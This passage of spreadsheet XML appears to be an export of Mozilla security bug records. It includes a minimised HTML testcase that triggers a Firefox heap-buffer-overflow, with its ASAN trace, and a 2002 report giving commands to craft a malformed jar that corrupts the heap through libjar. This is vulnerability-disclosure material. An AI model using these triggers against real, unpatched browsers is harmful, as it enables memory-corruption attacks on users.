      <c r="K4822" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L4822" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4822" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4822" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4822" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4822" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4822" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4822" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4822" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T4822" t="n">
        <v>1</v>
      </c>
      <c r="U4822" t="n">
        <v>0</v>
      </c>
      <c r="V4822" t="n">
        <v>22</v>
      </c>
      <c r="W4822" t="inlineStr">
        <is>
          <t>Created attachment 8928695
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=f0c0fb9182d695081edf170d8e3bcb8164f2c96a)
crash.html:
&lt;script&gt;
function start() {
	o1481=new DOMParser();
	o1506=o1481.parseFromString(undefined,'image/svg+xml');
	o1621=document.createElement('style');
	o1622=document.createTextNode('.class1');
	o1621.appendChild(o1622);
	o1807=document.createElement('shadow');
	document.replaceChild(o1506.documentElement,document.documentElement);
	document.documentElement.appendChild(o1621);
	o2064=document.createElementNS('http://www.w3.org/1999/xhtml','style');
	o2065=document.createTextNode('{"a"""}:root{ direction: rtl}\n*{ display: unset}:first-letter{ -moz-border-start: inherit; float: inherit; border-inline-start-style: dashed}:first-line{}\n*{ -moz-border-start-style: initial; float: right; -moz-column-width: 51mm;0');
	o2064.appendChild(o2065);
	o1807.appendChild(o2064);
	document.documentElement.appendChild(o1807);
        document.documentElement['getBoxQuads'](undefined);
	o1622.after('undefined');
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/script&gt;
ASAN output:
=================================================================
==20193==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030002674d8 at pc 0x7efe79ae5218 bp 0x7ffedbd1b5d0 sp 0x7ffedbd1b5c8
READ of size 8 at 0x6030002674d8 thread T0 (file:// Content)
    #0 0x7efe79ae5217 in Equals /builds/worker/workspace/build/src/layout/base/FrameProperties.h:399:16
    #1 0x7efe79ae5217 in IndexOf&lt;const mozilla::FramePropertyDescriptorUntyped *, mozilla::FrameProperties::PropertyComparator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1190
    #2 0x7efe79ae5217 in GetInternal /builds/worker/workspace/build/src/layout/base/FrameProperties.h:413
    #3 0x7efe79ae5217 in Get&lt;nsPlaceholderFrame&gt; /builds/worker/workspace/build/src/layout/base/FrameProperties.h:235
    #4 0x7efe79ae5217 in GetProperty&lt;nsPlaceholderFrame&gt; /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:3586
    #5 0x7efe79ae5217 in GetPlaceholderFrame /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:911
    #6 0x7efe79ae5217 in nsFirstLetterFrame::CreateContinuationForFloatingParent(nsPresContext*, nsIFrame*, nsIFrame**, bool) /builds/worker/workspace/build/src/layout/generic/nsFirstLetterFrame.cpp:319
    #7 0x7efe798c06ed in CreateContinuation(nsIFrame*, nsIFrame**, bool) /builds/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:647:23
    #8 0x7efe798bd928 in EnsureBidiContinuation /builds/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:1865:10
    #9 0x7efe798bd928 in nsBidiPresUtils::ResolveParagraph(BidiParagraphData*) /builds/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:924
    #10 0x7efe798b7f16 in nsBidiPresUtils::Resolve(nsBlockFrame*) /builds/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:765:10
    #11 0x7efe79a659ac in ResolveBidi /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:7528:10
    #12 0x7efe79a659ac in nsBlockFrame::GetMinISize(gfxContext*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:733
    #13 0x7efe79ad1b1a in nsColumnSetFrame::GetMinISize(gfxContext*) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:542:35
    #14 0x7efe79ad9117 in ShrinkWidthToFit /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:6237:22
    #15 0x7efe79ad9117 in nsContainerFrame::ComputeAutoSize(gfxContext*, mozilla::WritingMode, mozilla::LogicalSize const&amp;, int, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, nsIFrame::ComputeSizeFlags) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:845
    #16 0x7efe79ae03f1 in nsFrame::ComputeSize(gfxContext*, mozilla::WritingMode, mozilla::LogicalSize const&amp;, int, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, nsIFrame::ComputeSizeFlags) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:5496:24
    #17 0x7efe79a0836e in FloatMarginISize(mozilla::ReflowInput const&amp;, int, nsIFrame*, mozilla::SizeComputationInput const&amp;) /builds/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:692:13
    #18 0x7efe79a0491e in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:759:30
    #19 0x7efe79a09aba in mozilla::BlockReflowInput::PlaceBelowCurrentLineFloats(nsFloatCacheFreeList&amp;, nsLineBox*) /builds/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:1078:19
    #20 0x7efe79a90235 in nsBlockFrame::PlaceLine(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFloatManager::SavedState*, mozilla::LogicalRect&amp;, int&amp;, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4704:12
    #21 0x7efe79a8dfaa in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4099:12
    #22 0x7efe79a855e6 in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3845:9
    #23 0x7efe79a7edd2 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2829:5
    #24 0x7efe79a74a4f in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2365:7
    #25 0x7efe79a6bb3b in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1236:3
    #26 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
    #27 0x7efe79ace8bd in nsColumnSetFrame::ReflowChildren(mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:810:7
    #28 0x7efe79ad3e3e in ReflowColumns /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:507:19
    #29 0x7efe79ad3e3e in nsColumnSetFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:1245
    #30 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
    #31 0x7efe79ac80e4 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:757:5
    #32 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
    #33 0x7efe79b947e8 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
    #34 0x7efe79b95e9e in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&amp;) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
    #35 0x7efe79b991a9 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1041:3
    #36 0x7efe79a5277f in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, int, int, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:978:14
    #37 0x7efe79a5104b in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:336:7
    #38 0x7efe7984a3cc in mozilla::PresShell::DoReflow(nsIFrame*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:8984:11
    #39 0x7efe7985dc41 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9157:24
    #40 0x7efe7985cec3 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4230:11
    #41 0x7efe797d0b52 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #42 0x7efe797d0b52 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1921
    #43 0x7efe797de75b in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13
    #44 0x7efe797de75b in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306
    #45 0x7efe797de456 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5
    #46 0x7efe797e09ab in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5
    #47 0x7efe797e09ab in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682
    #48 0x7efe797e05b6 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9
    #49 0x7efe7a034f42 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #50 0x7efe73b98b21 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #51 0x7efe73a63f65 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1815:28
    #52 0x7efe736b91d9 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2119:25
    #53 0x7efe736b61ef in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2049:17
    #54 0x7efe736b7924 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1895:5
    #55 0x7efe736b7f78 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1928:15
    #56 0x7efe728f5e86 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #57 0x7efe72910618 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #58 0x7efe736c0e41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #59 0x7efe7362148b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #60 0x7efe7362148b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #61 0x7efe7362148b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #62 0x7efe790b6a0f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27
    #63 0x7efe7d3ede47 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #64 0x7efe7362148b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #65 0x7efe7362148b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #66 0x7efe7362148b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #67 0x7efe7d3ed7fa in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #68 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #69 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #70 0x7efe900a482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #71 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)
0x6030002674d8 is located 0 bytes to the right of 24-byte region [0x6030002674c0,0x6030002674d8)
allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7efe726cd544 in Malloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:211:46
    #3 0x7efe726cd544 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayInfallibleAllocator&gt;(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:136
    #4 0x7efe79ab003e in AppendElement&lt;mozilla::FrameProperties::PropertyValue, nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2217:47
    #5 0x7efe79ab003e in AddInternal /builds/worker/workspace/build/src/layout/base/FrameProperties.h:451
    #6 0x7efe79ab003e in Add&lt;nsMargin&gt; /builds/worker/workspace/build/src/layout/base/FrameProperties.h:190
    #7 0x7efe79ab003e in AddProperty&lt;nsMargin&gt; /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:3609
    #8 0x7efe79ab003e in nsFrame::DidSetStyleContext(nsStyleContext*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:1132
    #9 0x7efe7989f95e in SetStyleContext /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:805:7
    #10 0x7efe7989f95e in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&amp;) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1626
    #11 0x7efe7989ff1c in mozilla::ServoRestyleManager::ReparentFrameDescendants(nsIFrame*, nsIFrame*, mozilla::ServoStyleSet&amp;) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1676:9
    #12 0x7efe7989fb02 in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&amp;) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1659:3
    #13 0x7efe7989ff1c in mozilla::ServoRestyleManager::ReparentFrameDescendants(nsIFrame*, nsIFrame*, mozilla::ServoStyleSet&amp;) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1676:9
    #14 0x7efe7989fb02 in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&amp;) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1659:3
    #15 0x7efe7989ff1c in mozilla::ServoRestyleManager::ReparentFrameDescendants(nsIFrame*, nsIFrame*, mozilla::ServoStyleSet&amp;) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1676:9
    #16 0x7efe7989fb02 in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&amp;) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1659:3
    #17 0x7efe7989f45e in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&amp;) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1538:7
    #18 0x7efe7989c0a1 in mozilla::ServoRestyleManager::ReparentStyleContext(nsIFrame*) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1497:3
    #19 0x7efe79c34397 in ReparentStyleContext /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:79:3
    #20 0x7efe79c34397 in PullOneFrame /builds/worker/workspace/build/src/layout/generic/nsInlineFrame.cpp:1058
    #21 0x7efe79c34397 in nsFirstLineFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsInlineFrame.cpp:1118
    #22 0x7efe79c2f8c9 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&amp;, mozilla::ReflowOutput*, bool&amp;) /builds/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:922:13
    #23 0x7efe79a8ec74 in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4175:15
    #24 0x7efe79a8d8b2 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3971:5
    #25 0x7efe79a855e6 in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3845:9
    #26 0x7efe79a7edd2 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2829:5
    #27 0x7efe79a74a4f in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2365:7
    #28 0x7efe79a6bb3b in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1236:3
    #29 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
    #30 0x7efe79ace8bd in nsColumnSetFrame::ReflowChildren(mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:810:7
    #31 0x7efe79ad3e3e in ReflowColumns /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:507:19
    #32 0x7efe79ad3e3e in nsColumnSetFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:1245
    #33 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
    #34 0x7efe79ac80e4 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:757:5
    #35 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
    #36 0x7efe79b947e8 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
    #37 0x7efe79b95e9e in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&amp;) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
    #38 0x7efe79b991a9 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1041:3
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/layout/base/FrameProperties.h:399:16 in Equals
Shadow bytes around the buggy address:
  0x0c0680044e40: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa
  0x0c0680044e50: fd fd fd fd fa fa fd fd fd fa fa fa fd fd fd fd
  0x0c0680044e60: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd
  0x0c0680044e70: fd fa fa fa fd fd fd fd fa fa 00 00 00 fa fa fa
  0x0c0680044e80: fd fd fd fd fa fa fd fd fd fa fa fa fd fd fd fd
=&gt;0x0c0680044e90: fa fa fd fd fd fa fa fa 00 00 00[fa]fa fa 00 00
  0x0c0680044ea0: 00 00 fa fa fd fd fd fd fa fa 00 00 00 00 fa fa
  0x0c0680044eb0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c0680044ec0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c0680044ed0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c0680044ee0: 00 00 04 fa fa fa 00 00 00 00 fa fa fd fd fd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0193==ABORTING</t>
        </is>
      </c>
      <c r="X4822" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4823">
      <c r="A4823" t="n">
        <v>157646</v>
      </c>
      <c r="B4823" t="inlineStr">
        <is>
          <t>2002-07-15 18:54:14 -0700</t>
        </is>
      </c>
      <c r="C4823" t="inlineStr">
        <is>
          <t>Possible heap corruption in libjar</t>
        </is>
      </c>
      <c r="D4823" t="inlineStr">
        <is>
          <t>2002-11-21 13:51:27 -0800</t>
        </is>
      </c>
      <c r="E4823" t="n">
        <v>1</v>
      </c>
      <c r="F4823" t="n">
        <v>1</v>
      </c>
      <c r="G4823" t="n">
        <v>3</v>
      </c>
      <c r="H4823" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4823" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4823" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4823" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4823" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4823" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4823" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4823" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4823" t="inlineStr">
        <is>
          <t>[sg:blocker]</t>
        </is>
      </c>
      <c r="Q4823" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4823" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4823" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4823" t="n">
        <v>1</v>
      </c>
      <c r="U4823" t="n">
        <v>0</v>
      </c>
      <c r="V4823" t="n">
        <v>22</v>
      </c>
      <c r="W4823" t="inlineStr">
        <is>
          <t>Submitter name:                zen-parse
   Submitter email address:       zen-parse@gmx.net
   Acknowledgement checkbox:      on
   Product:                       Netscape 6.x
   Operating system:              Unix: x86 Linux
   OS version:                    Redhat 7.0
   Issue summary:                 Exploitable heap corruption via jar: URI handler.
Issue details:
Details to verify existance of problem.
Create a file, called test.gif with the 
following 6 'int's in it.
0x2d6e657a,0x65726568,
0x00000000,0x00000000,
0xdeadbeef,0xfee1600d
$ zip orig.jar test.gif
  adding: test.gif (deflated 17%)
$ unzip -v orig.jar
Archive:  orig.jar
 Length   Method    Size  Ratio   Date   Time 
  CRC-32    Name
--------  ------  ------- -----   ----   ---- 
  ------    ----
      24  Defl:N       20  17%  07-08-02 
16:11  b74deafe  test.gif
--------          -------  ---                
            -------
      24               20  17%                
            1 file
$ sed s/`printf '\x18'`/`printf '\x01'`/g 
orig.jar &gt;new.jar
$ unzip -v new.jar 
Archive:  new.jar
 Length   Method    Size  Ratio   Date   Time 
  CRC-32    Name
--------  ------  ------- -----   ----   ---- 
  ------    ----
       1  Defl:N       20 -1900%  07-08-02 
16:11  b74deafe  test.gif
--------          -------  ---                
            -------
       1               20 -1900%              
              1 file
$ cp new.jar ~/public_html
(This file only contains the 2 0x18s (24s) 
representing the realsize, so
it works ok on this file. Actual explot uses 
a hex editor.)
In Netscape open:
   jar:http://host/~username/new.jar!/test.gif
The jr file is retrieved, the requested file 
is found...
...
584   //-- Read the item into memory
585   //   Inflate if necessary and save in 
mInflatedFileBuffer
586   //   for sequential reading.
587   //   (nsJAR needs the whole file in 
memory before passing it on)
588   char* buf = 
(char*)PR_Malloc(item-&gt;realsize);
589   if (!buf) return ZIP_ERR_MEMORY;
590   switch(item-&gt;compression)
591   {
592     case DEFLATED:
593       result = InflateItem(item, 0, buf);
594       break;...
A buffer is allocated for storing the data. 
The realsize value is used for
the length. (Size 1 actually allocates 8 
bytes, hence the padding.)
The buf is the passed to the inflater.
...
1268 PRInt32 nsZipArchive::InflateItem( const 
